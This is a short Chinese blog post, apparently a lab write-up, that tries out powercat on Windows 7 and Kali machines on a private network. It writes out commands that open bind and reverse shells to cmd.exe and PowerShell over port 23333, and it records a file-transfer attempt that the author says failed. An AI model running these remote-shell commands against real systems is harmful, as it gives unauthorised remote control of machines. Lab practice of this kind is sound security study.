windows 反弹shell_windows版瑞士军刀powercat之牛刀小试

6e13997dcbf31e12fdeed0534e56fc64.png

时间过的太快,又到深夜了,又要开始刷抖音或网抑云了。今天一位同事因为晚上没有加班,去拿20块钱的夜宵,被举报了。这种在领导面前打小报告的人,职场里面非常多。同事之间要多堤防着,保不准哪一天其中有人会出卖你。这篇文章做了4个小实验:

  • powercat 正向shell(windows-linux)
  • powercat 反向shell(windows-linux)
  • powercat 反向powershell(windows-windows)
  • powercat 反向获取文件(windows-windows)(失败了)
powercat 正向shell(windows-linux)
  • 在win7上运行powercat,先弹shell后连接(属于正向shell)
powercat -l -p 23333 -e cmd.exe -v

2031661aecb52f24d8d8b787ace5b497.png
  • 在kali rolling上连接
nc 192.168.160.135 23333 -vv

4cb2e2510627a86d07f355c949dc671e.png
powercat 反向shell(windows-linux)
  • 在kali rolling上监听
nc -lp 23333 -vv

0a4d33be09fdb7e83902e553f920dd3b.png
  • 在win7上运行powercat,弹出一个cmd
powercat -c 192.168.160.140 -p 23333 -v -e cmd.exe

0c9631e65dc1e89d99846236b0289711.png
powercat 反向powershell(windows-windows)
  • 在win7(ailx00)上运行powercat,监听23333端口(先听后弹,属于反向shell)
powercat -l -p 23333 -v

bab76ed0026aebca91a609f9d9a62e66.png
  • 在win7上((ailx01))运行powercat,反弹一个poweshell
powercat -c 192.168.160.135 -p 23333 -v -ep

78a4657b5283d3e75f820a9ec0e89fe8.png
powercat 反向获取文件(windows-windows)
  • 然鹅,这个实验并没有成功,不知道哪出问题了
  • 正着做,反着做,都不对,算了,就酱紫了
  • 在win7(ailx01)上运行powercat,监听23333端口(先听后弹,属于反向shell)

cabf74b2fa1a53acf6a0eae6ef7055c7.png
  • 在win7(ailx00)上运行powercat,发送文件

3cbf75b6ca3a5e9f267c1eb33eee633f.png

本篇完~

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值